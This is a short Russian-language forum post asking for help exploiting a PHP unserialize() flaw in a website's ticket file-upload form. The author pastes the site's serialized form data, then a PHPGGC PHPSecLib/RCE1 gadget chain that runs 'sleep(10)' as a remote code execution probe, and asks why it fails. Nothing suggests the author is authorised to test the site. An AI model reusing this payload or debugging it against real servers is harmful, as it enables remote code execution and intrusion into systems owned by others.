Всем привет. Не люблю эту дырку)
У сайта параметры при загрузке файла
Нашел phpseclib/phpseclib": "^2.0.31" В /vendor/composer/installed.json
Сгенерил нагрузку через GitHub - ambionics/phpggc: PHPGGC is a library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically.
./phpggc PHPSecLib/RCE1 'sleep(10);'
Вставил что то не фурычит
Правильно сделал?
А то я думаю это у меня руки кривые, или библиотеке нет такой
У сайта параметры при загрузке файла
Код:
a:4:{s:11:"form-object";s:25:"ticket/forms:updateticket";s:13:"form-saveable";a:4:{s:8:"formName";s:13:"updateticket0";s:6:"object";O:8:"stdClass":3:{s:12:"ticketUserID";s:6:"153595";s:10:"ticketTime";s:10:"1694774649";s:11:"ticketState";s:2:"10";}s:14:"formRenderMode";b:0;s:17:"formSuccessAction";s:6:"reload";}s:13:"form-controls";a:7:{s:11:"ticketTheme";a:3:{i:0;s:6:"select";i:1;s:8:"required";i:2;b:0;}s:10:"ticketText";a:3:{i:0;s:8:"textarea";i:1;s:8:"required";i:2;b:0;}s:12:"ticketPutOff";a:3:{i:0;s:8:"checkbox";i:1;b:0;i:2;b:0;}s:10:"ticketFile";a:3:{i:0;s:4:"file";i:1;b:0;i:2;b:0;}s:6:"action";a:3:{i:0;s:6:"hidden";i:1;b:0;i:2;b:0;}s:9:"subjectID";a:3:{i:0;s:6:"hidden";i:1;b:0;i:2;b:0;}s:6:"ticket";a:3:{i:0;s:6:"submit";i:1;b:0;i:2;b:0;}}s:11:"live-object";a:3:{s:6:"object";s:13:"ticket:ticket";s:2:"id";i:0;s:4:"info";a:0:{}}}
Нашел phpseclib/phpseclib": "^2.0.31" В /vendor/composer/installed.json
Сгенерил нагрузку через GitHub - ambionics/phpggc: PHPGGC is a library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically.
./phpggc PHPSecLib/RCE1 'sleep(10);'
Код:
a:1:{i:0;O:18:"phpseclib\Net\SSH1":2:{s:6:"bitmap";i:1;s:6:"crypto";O:19:"phpseclib\Crypt\AES":8:{s:6:"bitmap";i:1;s:6:"crypto";i:1;s:10:"block_size";N;s:12:"inline_crypt";a:2:{i:0;O:25:"phpseclib\Crypt\TripleDES":6:{s:10:"block_size";s:38:"1){}}}; ob_clean();sleep(10);die(); ?>";s:12:"inline_crypt";N;s:16:"use_inline_crypt";i:1;s:7:"changed";i:0;s:6:"engine";i:1;s:4:"mode";i:1;}i:1;s:26:"_createInlineCryptFunction";}s:16:"use_inline_crypt";i:1;s:7:"changed";i:0;s:6:"engine";i:1;s:4:"mode";i:1;}}}
Вставил что то не фурычит
Правильно сделал?
А то я думаю это у меня руки кривые, или библиотеке нет такой